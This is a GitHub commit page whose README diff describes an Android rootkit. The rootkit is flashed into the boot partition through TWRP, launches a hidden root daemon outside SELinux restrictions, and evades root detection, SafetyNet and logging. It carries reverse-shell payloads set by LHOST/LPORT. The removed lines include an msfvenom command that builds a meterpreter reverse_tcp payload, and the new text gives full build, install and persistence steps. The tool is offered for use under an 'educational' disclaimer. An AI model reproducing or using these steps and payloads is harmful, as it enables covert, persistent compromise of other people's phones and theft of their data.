Skip to content

Commit e3d06ec

Browse files
committed
transfer to git
1 parent 4fa52e2 commit e3d06ec

File tree

539 files changed

+1029
-42951
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

539 files changed

+1029
-42951
lines changed

README.MD

Lines changed: 121 additions & 56 deletions
Original file line numberDiff line numberDiff line change
@@ -1,108 +1,173 @@
1-
# Unlocked bootloader backdoor demo for Android
1+
# Flashable Usermode Rootkit for Android
22

3-
### [An article with full explaination / Статья на хабре с полным пояснением](https://habr.com/ru/post/541190/)
3+
#### A reworked version of [unlocked-bootloader-backdoor-demo](https://github.com/LuigiVampa92/unlocked-bootloader-backdoor-demo) by LuigiVampa92
44

5-
This is a tool that installs a custom binary into a system partition. This binary runs as a system daemon with root privileges and not restricted by SELinux policies. This tool is based on [Magisk](https://github.com/topjohnwu/Magisk) source code, but does not necessary require root or magisk preinstalled on the device. So basically this IS the magisk but only the part that injects new SELinux policies. It injects magiskinit binary in boot partition but does not install or use any other magisk tools. It also does not add any magisk files to device filesysytem, which allows it to avoid simple root detection tools, but unfortunately it is still detectable by SafetyNet.
5+
#### This is currently an experimental work. Stability is not guaranteed.
66

7-
The goal of this is to show that unlocking the bootloader can expose your device to an attacker with physical access.
7+
FURA is a systemless flashable backdoor installed into boot partition, particularly into _init_ binary.
8+
On boot, it launches a system daemon with root privileges and unrestricted SELinux context, which is also hidden from process list.
9+
Since it's operating within ramdisk, this tool can bypass most root checks, integrity checks, etc. and presumably cannot be detected without root _(not even by ADB shell)_.
810

9-
I successfully tested it on android 9 with normal init process and android 10 with two-staged init. It should work on other configurations as well but there can be troubles.
11+
Unlike its predecessor, this rootkit can bypass SafetyNet, since it doesn't need to modify system partition. \
12+
However, it can't bypass hardware checks, such as hardware-backed SafetyNet on newer devices.
1013

11-
In this repo the embedded binary is made for the demo purposes only. It just drops a line to logcat once in 5 seconds, but you cat replace it with your own if you want. For example, if you are on Kali you can generate the reverse shell payload:
12-
```
13-
$ rm revshell/revshell
14-
$ msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST=<YOUR_LISTENER_IP> LPORT=<YOUR_LISTENER_PORT> -f elf > revshell/revshell
15-
```
16-
After that you can build the packages and flash your binary instead of the one provided with the repo.
14+
The daemon is a custom executor (sort of a service manager) for an arbitrary payload.
15+
It runs silently and normally leaves no traces in _dmesg_, _logcat_, etc., unlike a regular service run by _init_ in loop.
1716

18-
## Prerequisites
17+
FURA uses SELinux to its own advantage: not only to bypass stock policy restrictions, but to hide itself from the rest of the system.
1918

20-
- First, you have to install android SDK for your OS if you haven't already.
21-
- Second, make sure you have python3 installed.
19+
This tool, like its predecessor, is based on [Magisk](https://github.com/topjohnwu/Magisk) source code, but does not necessary require root or Magisk preinstalled on the device.
20+
It mostly uses a part of MagiskInit to patch SELinux policy.
21+
22+
## Prerequisites
2223

23-
After that you are all set up.
24+
- Python 3
25+
- Android SDK
26+
- ADB / Fastboot tools
27+
- Custom recovery image for your device (TWRP is recommended)
28+
- ##### **No Magisk installed on device!!!** &ensp; (compatibility issues cause bootloop)
2429

2530
## Build
2631

27-
The result package is a TWRP sideloadable zip file.
32+
_cd_ into main project directory.
2833

29-
set a ANDROID_SDK_ROOT variable in your shell. For example:
34+
Set ANDROID_SDK_ROOT variable in your shell. For example:
3035
```
31-
$ ANDROID_SDK_ROOT=/usr/lib/android-sdk
32-
$ export ANDROID_SDK_ROOT
36+
$ export ANDROID_SDK_ROOT=/opt/android-sdk
3337
```
3438

35-
Prepare NDK for the build:
39+
Install and configure NDK:
3640
```
3741
$ ./build_revshell.py ndk
3842
```
3943

40-
Run the build:
44+
Run the build script:
4145
```
46+
$ ./build_revshell.py clean # before rebuild if changed config
4247
$ ./build_revshell.py
4348
```
4449

45-
## Download
50+
The result is a sideloadable _.zip_ package which can be installed with TWRP or other recovery.
51+
52+
_Note_: if using reverse shell payloads (such as ReverseSSH, Meterpreter, etc.), set your LHOST and LPORT in `config.prop` before building.
53+
54+
_Note_: if SELinux is _permissive_ or _off_ on the target device, you can use alternative hiding method. See `config.prop` for details.
55+
56+
_Note_: you can disable logging (logcat and selinux) by setting `release=True` in the end of `build_revshell.py`.
57+
4658

47-
You can download release packages directly:
48-
- [zip_reverse_shell_install.zip](https://github.com/LuigiVampa92/unlocked-bootloader-backdoor-demo/releases/download/v1.0/zip_reverse_shell_install.zip)
49-
- [zip_reverse_shell_uninstall.zip](https://github.com/LuigiVampa92/unlocked-bootloader-backdoor-demo/releases/download/v1.0/zip_reverse_shell_uninstall.zip)
59+
## Deploy
5060

51-
## Install
61+
#### Install
5262

53-
Run TWRP on your device.
63+
Run TWRP on your device:
64+
```
65+
$ fastboot boot twrp.img
66+
```
5467

55-
Start sideload feature in Advanced/Sideload and then run:
68+
Start sideload feature in Advanced / Sideload and then run:
5669
```
57-
$ adb sideload zip_reverse_shell_install.zip
70+
$ adb sideload zip_reverse_shell_v2.zip
5871
```
5972

60-
Check out the output log carefully. If you have been warned that you need to backup original partitions then you have to run the command below BEFORE rebooting into system, otherwise you will not be able to uninstall this tool properly and will have to find stock boot image for your device somewhere and flash it.
73+
At this moment, **do not reboot** right away. Backup original boot partition:
6174
```
6275
$ adb pull /tmp/backup_original_partitions .
6376
```
6477

65-
Reboot into system.
78+
Run the command **before** rebooting into system, otherwise you will not be able to uninstall this tool properly and will have to find stock boot image for your device somewhere and flash it.
6679

67-
You should now be able to see new lines in logcat:
80+
Reboot into system after you have backups on your PC.
6881

82+
#### Uninstall
83+
84+
You need a backup of original partitions made during installation. Move it to _/tmp_:
6985
```
70-
$ adb logcat | grep revshell
71-
01-31 23:42:07.587 3589 3589 D revshell: Start successfull!
72-
01-31 23:42:07.588 3589 3589 D revshell: Signals are set to ignore
73-
01-31 23:42:07.588 3589 3589 D revshell: Hey I'm a revshell process!
74-
01-31 23:42:07.588 3589 3589 D revshell: My PID -- 3589
75-
01-31 23:42:07.588 3589 3589 D revshell: My parent PID -- 1
76-
01-31 23:42:07.588 3589 3589 D revshell: My UID -- 0
77-
01-31 23:42:07.588 3589 3589 D revshell: Awaiting encrypted FS decryption now...
78-
01-31 23:42:27.597 3589 3589 D revshell: FS has been decrypted!
79-
01-31 23:42:27.597 3589 3589 D revshell: Starting reverse shell now
80-
01-31 23:42:32.597 3589 3589 D revshell: tick ! 25 seconds since process started
81-
01-31 23:42:37.598 3589 3589 D revshell: tick ! 30 seconds since process started
82-
01-31 23:42:42.599 3589 3589 D revshell: tick ! 35 seconds since process started
83-
01-31 23:42:47.600 3589 3589 D revshell: tick ! 40 seconds since process started
86+
$ adb push backup_original_partitions /tmp/
8487
```
8588

86-
## Uninstall
89+
Start sideload feature in Advanced / Sideload and then run:
90+
```
91+
$ adb sideload zip_reverse_shell_uninstall.zip
92+
```
8793

88-
Use zip_reverse_shell_uninstall.zip to properly uninstall this tool.
94+
Reboot into system.
8995

90-
If during installation you have made a backup of original partitions then run:
96+
... or you can just flash stock boot image if you have one:
9197
```
92-
$ adb push backup_original_partitions /tmp/backup_original_partitions
98+
$ fastboot flash boot boot.img
9399
```
94100

95-
Start sideload feature in Advanced/Sideload and then run:
101+
#### Installation scripts
102+
103+
There are installation scripts to automate install / reinstall process. \
104+
Before running one, rename or symlink your TWRP image as `twrp` in your current directory.
105+
106+
Simply connect your device via USB and switch it into Fastboot mode.
107+
After installation, backups will be saved automatically.
108+
109+
`install.sh` to install and save backup image. \
110+
`reinstall.sh` to reinstall quickly (if you have the backup).\
111+
`uninstall.sh` to restore original boot image from backup.
112+
113+
## Test
114+
115+
The default payload in this repo is a dummy program that writes stuff to logcat.
116+
117+
After boot is completed, you should be able to see its output:
118+
96119
```
97-
$ adb sideload zip_reverse_shell_uninstall.zip
120+
$ adb logcat | grep revshell
121+
03-18 00:34:41.732 2381 2381 D revshell_exec: Remounting /sbin to avoid mount detection ...
122+
03-18 00:34:41.732 2381 2381 D revshell_exec: Setting up /mnt/secure/temp
123+
03-18 00:34:41.732 2381 2381 D revshell_exec: Awaiting decryption ...
124+
03-18 00:34:41.732 2381 2381 D revshell_exec: Decrypted. Setting persistence dir at /data/adb/.aura
125+
03-18 00:34:46.817 2381 2381 I revshell_exec: restarting ...
126+
03-18 00:34:46.884 3197 3197 D revshell: Start successfull!
127+
03-18 00:34:46.885 3197 3197 D revshell: Signals are set to ignore
128+
03-18 00:34:46.885 3197 3197 D revshell: Hey I'm a revshell process!
129+
03-18 00:34:46.885 3197 3197 D revshell: My PID -- 3197
130+
03-18 00:34:46.885 3197 3197 D revshell: My parent PID -- 2381
131+
03-18 00:34:46.885 3197 3197 D revshell: My UID -- 0
132+
03-18 00:34:46.885 3197 3197 D revshell: Awaiting encrypted FS decryption now...
133+
03-18 00:34:51.241 2381 2381 D revshell_exec: Checking PID
134+
03-18 00:34:51.311 3197 3197 D revshell: FS has been decrypted!
135+
03-18 00:34:51.311 3197 3197 D revshell: Starting reverse shell now
136+
03-18 00:34:56.242 2381 2381 D revshell_exec: Checking PID
137+
03-18 00:34:56.312 3197 3197 D revshell: tick ! 10 seconds since process started
138+
03-18 00:35:01.244 2381 2381 D revshell_exec: Checking PID
139+
03-18 00:35:01.312 3197 3197 D revshell: tick ! 15 seconds since process started
140+
03-18 00:35:06.244 2381 2381 D revshell_exec: Checking PID
98141
```
99142

100-
Reboot into system.
143+
You can disable logging (logcat and selinux) by setting `release=True` in the end of `build_revshell.py`.
144+
145+
## Custom payloads
146+
147+
To embed a custom payload, simply put your executable into `revshell/{arch}/` as `revshell`. It is not required to place executables for all archs: those where `revshell` is absent will use default payload.
148+
149+
For more details on custom payloads, see _revshell_ directory.
150+
101151

102152
## Acknowledgments
103153

104-
Great thanks to topjohnwu and magisk contributors for their amazing work and incredible contribution to android tinkerers community. This Demo wouldn't even exist without them.
154+
Thanks to LuigiVampa92 for a [great article](https://habr.com/ru/articles/541190/) on a physical access attack concept for devices with unlocked bootloader.
155+
156+
Thanks to topjohnwu and all Magisk maintainers for that brilliant swiss army knife for Android and a great contribution to Android modding community.
157+
158+
## Links
159+
160+
[Magisk repository](https://github.com/topjohnwu/Magisk) \
161+
[Original system backdoor](https://github.com/LuigiVampa92/unlocked-bootloader-backdoor-demo)
105162

106-
## Links:
107163

108-
[Original Magisk repository](https://github.com/topjohnwu/Magisk)
164+
## Disclaimer
165+
166+
This tool is designed for educational purposes only. You may utilize this software solely on
167+
your personal devices. Any attempt to use this tool on a device without explicit authorization
168+
is unethical and may violate privacy laws.
169+
170+
Running this tool may result in bricking or damaging your device. Create backups of your data
171+
and /boot (/boot_a, /boot_b) partitions before using the tool.
172+
173+
Use at your own risk. The developer is not responsible for any damage or loss caused by this tool.

app/.gitignore

Lines changed: 0 additions & 11 deletions
This file was deleted.

0 commit comments

Comments
 (0)